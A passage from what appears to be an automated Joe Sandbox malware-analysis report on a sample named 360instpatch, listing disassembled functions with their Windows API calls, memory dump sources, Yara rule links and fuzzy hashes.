                                                                                                                                                                                                              • Opcode Fuzzy Hash: 714cdcec14007ae9ffffe19332fd31a4fffb1df7e6f1b001b09f076baf9b5393
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A611D071C04A08CAEF11EB94C881DADFBFAFF55300F10808AE549A7251CF345A05DB21
                                                                                                                                                                                                              Function 6BF11F45 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: __EH_prolog3_catch.LIBCMT ref: 6BF0E546
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: __CxxThrowException@8.LIBCMT ref: 6BF0E56A
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 6BF0E5F1
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: GetLastError.KERNEL32 ref: 6BF0E600
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 6BF0E628
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: GetLastError.KERNEL32 ref: 6BF0E632
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 6BF0E64B
                                                                                                                                                                                                                • Part of subcall function 6BF0E53F: GetLastError.KERNEL32 ref: 6BF0E658
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11F6F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11F74
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CountCreateTickTimerWaitable$Exception@8H_prolog3_catchMutexThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1909352761-0
                                                                                                                                                                                                              • Opcode ID: 6987e6f4b6dad5032c5a38376070ebec8676fdbd6775d79fb3c131a958f7f8b5
                                                                                                                                                                                                              • Instruction ID: f3a7c89f5071829cd2da4f64bd772befa5b61024fdfb0c6d47af992fcaccff4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6987e6f4b6dad5032c5a38376070ebec8676fdbd6775d79fb3c131a958f7f8b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 981118B1904B919EC370CF3B8884D97FAF8FBE6B04750091EE596C2A20E775E440CB61
                                                                                                                                                                                                              Function 6CD34D0B Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000E,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?,00000001,?,?,?,00000000), ref: 6CD34D23
                                                                                                                                                                                                              • CreateWindowExW.USER32(?,00000000,?,?,?,00000002,?,?,?,00000000,?,6CE53338), ref: 6CD34D94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732789607-0
                                                                                                                                                                                                              • Opcode ID: d9a44395c12f11ffe78540810b7551e8897cbe05eb5522e6847ec10e7382e427
                                                                                                                                                                                                              • Instruction ID: a36fa85dd2d3b4d176dda64cb7f4c1c902ed253e26db0dd8e9d3ea80bcbcb3d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a44395c12f11ffe78540810b7551e8897cbe05eb5522e6847ec10e7382e427
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3115A35200219EFDB028F55DC05FEA7BB9EF4A314F019119FC189A6A0D7BAD860CFA0
                                                                                                                                                                                                              Function 6BF1AE38 Relevance: 3.1, APIs: 2, Instructions: 53networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF1AE44
                                                                                                                                                                                                                • Part of subcall function 6BF16EF2: GetTickCount.KERNEL32 ref: 6BF16EFF
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 6BF1AEAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1305442257-0
                                                                                                                                                                                                              • Opcode ID: 0e712ef447b0bc317e747afaff4c5451ebb011c2f63973ebb650cdadd47f34c4
                                                                                                                                                                                                              • Instruction ID: 71644608de2d80c4682d1b25fd5ad3650d97602a7c49d7bff67efd24db45b7e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e712ef447b0bc317e747afaff4c5451ebb011c2f63973ebb650cdadd47f34c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112572A00101BBCF149BB4C888FDEBBB8FF08314F004659F515D71A0DB389814CBA0
                                                                                                                                                                                                              Function 6BF37D19 Relevance: 3.0, APIs: 2, Instructions: 49networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 533350023-0
                                                                                                                                                                                                              • Opcode ID: a1d93375e4bdf8e7f20f69ce02c1bb7fde569b814ff6f9c521eeeefd3afe433d
                                                                                                                                                                                                              • Instruction ID: f4be8585a040d41e50349a0c4c3e2a06e49527d9a4bc5dfbb1fe27474c1358f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d93375e4bdf8e7f20f69ce02c1bb7fde569b814ff6f9c521eeeefd3afe433d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A01257390021A9AEB30DBA4CC81FFEB3ACAF1A308F504579D515D61D1EBB89508DB51
                                                                                                                                                                                                              Function 00B82080 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B2898E: RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00B289A8
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00B7EAA4,?,?,00100000,00000000,0000008C), ref: 00B820EE
                                                                                                                                                                                                                • Part of subcall function 00B28940: RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00B28967
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateCriticalInitializeOpenSection
                                                                                                                                                                                                              • String ID: SOFTWARE\360Safe\softmgr\dio
                                                                                                                                                                                                              • API String ID: 2223640745-1814773269
                                                                                                                                                                                                              • Opcode ID: 1870a4c525f826f766e4172b6f4b0de6686d9053b78e42fedbafb974d8973945
                                                                                                                                                                                                              • Instruction ID: 6d1efc7805ca4dfa4591f400e02a9a9a5177bc089295cd1d57df4098d1363f8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1870a4c525f826f766e4172b6f4b0de6686d9053b78e42fedbafb974d8973945
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B0178B0640719AAD3309F699CC1867FBECFF087503904A6EE19AC3A92DA70B9448720
                                                                                                                                                                                                              Function 6BF24970 Relevance: 3.0, APIs: 2, Instructions: 37fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF23C52: CloseHandle.KERNEL32(00000000,6BFCC288,6BF2497A,00000001,6BFCC288,00000000,6BF11C74,?), ref: 6BF23C5D
                                                                                                                                                                                                                • Part of subcall function 6BEE9134: _wcslen.LIBCMT ref: 6BEE913B
                                                                                                                                                                                                              • CreateFileW.KERNEL32(6BFCC28C,40000000,00000001,00000000,00000004,00000000,00000000,6BFCC288,00000001,6BFCC288,00000000,6BF11C74,?), ref: 6BF249A5
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,00000000,?,?,6BF8AC78), ref: 6BF249BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointer_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4003891552-0
                                                                                                                                                                                                              • Opcode ID: 424b290c4fcf5eaad3294b321eb27a9566b3f9b01bdd6fab128af8eebd9c75c6
                                                                                                                                                                                                              • Instruction ID: d5cfc2ecb6f24cc1328af74789802313d0b250d21d1d272479c0f083ff47b487
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 424b290c4fcf5eaad3294b321eb27a9566b3f9b01bdd6fab128af8eebd9c75c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBF0B4B3501205AEE6208A648CC9F6BB2ADEB95768F110529F341632A0C7B4AC0086B0
                                                                                                                                                                                                              Function 00B465CA Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00B465F1
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00B465FD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Rect$ClientInvalidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 645284650-0
                                                                                                                                                                                                              • Opcode ID: 309ea2ecb93ca41d19a6adfea5606d73cb38dd4d54d15882bde6c4af2e213307
                                                                                                                                                                                                              • Instruction ID: c6c3090165d5aa2a2ca7c9b9741eaaa4d7461e3e7b841a802db9a5e7de43cc1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 309ea2ecb93ca41d19a6adfea5606d73cb38dd4d54d15882bde6c4af2e213307
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F06931900604EBC721DF4AC8449EEFBF9EBD5700B10856AE066A2120D771AA40DA51
                                                                                                                                                                                                              Function 6BF3305E Relevance: 3.0, APIs: 2, Instructions: 35networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonlhtons
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 493294928-0
                                                                                                                                                                                                              • Opcode ID: a5f6ce7cec7e082737ba96de5269a8435884b9e06bee597b5b8090e304867680
                                                                                                                                                                                                              • Instruction ID: b0ba77af20e7ef2a4d3f308bd0403a215c463414fbb99205de2755361606eb75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5f6ce7cec7e082737ba96de5269a8435884b9e06bee597b5b8090e304867680
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF06272910219ABDF10DFB88806ABF77B8EF19600F40406AF901EB190DA78CA04C7A1
                                                                                                                                                                                                              Function 6BF3305D Relevance: 3.0, APIs: 2, Instructions: 35networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonlhtons
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 493294928-0
                                                                                                                                                                                                              • Opcode ID: a54dda2d4fae7bfec6ebe3bbf63c6b7f5c4421a5f9cba2aeded71329b20d571d
                                                                                                                                                                                                              • Instruction ID: 3808deb4e7bae415ca6a91ab70050c83987cd559cfb9e79c33017454cd4c0186
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a54dda2d4fae7bfec6ebe3bbf63c6b7f5c4421a5f9cba2aeded71329b20d571d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F06872910215ABDF10DFB4C406AFF77B4EF19640F00415AF901E7190DB78CA04C791
                                                                                                                                                                                                              Function 6BEE7D28 Relevance: 3.0, APIs: 2, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6BEE7D5A
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE7D6F
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4063778783-0
                                                                                                                                                                                                              • Opcode ID: 8960cc760e493b5ae692b4887b958ca5b1eb563477ec460abfc01cb19421ebee
                                                                                                                                                                                                              • Instruction ID: e3bf1820b7c87c8e3e4faf562ee6b0fbc2fac23e38f4bc9621cf4a40cf47ad96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8960cc760e493b5ae692b4887b958ca5b1eb563477ec460abfc01cb19421ebee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF0E5738101086BCB48DEB4C441EEE377DDB00258F20816E9426D2491EB78D6498BA1
                                                                                                                                                                                                              Function 6BEE7CDE Relevance: 3.0, APIs: 2, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6BEE7D0D
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE7D22
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4063778783-0
                                                                                                                                                                                                              • Opcode ID: 11b48289416c79de121b9d88de99cfb3b0c52266f26bd5d76d2d81d28359c016
                                                                                                                                                                                                              • Instruction ID: 7dfe67e25527dc37e33ecf567a4fca955c3248f184011479a3ff9f1481bc6a1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11b48289416c79de121b9d88de99cfb3b0c52266f26bd5d76d2d81d28359c016
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E09B739101086AD748DEB8D441FEE77BDEB44254F20826DD826D1095DB7DD6448BA1
                                                                                                                                                                                                              Function 6CD9B931 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 6CD9B943
                                                                                                                                                                                                              • PathIsDirectoryW.SHLWAPI(?), ref: 6CD9B94E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
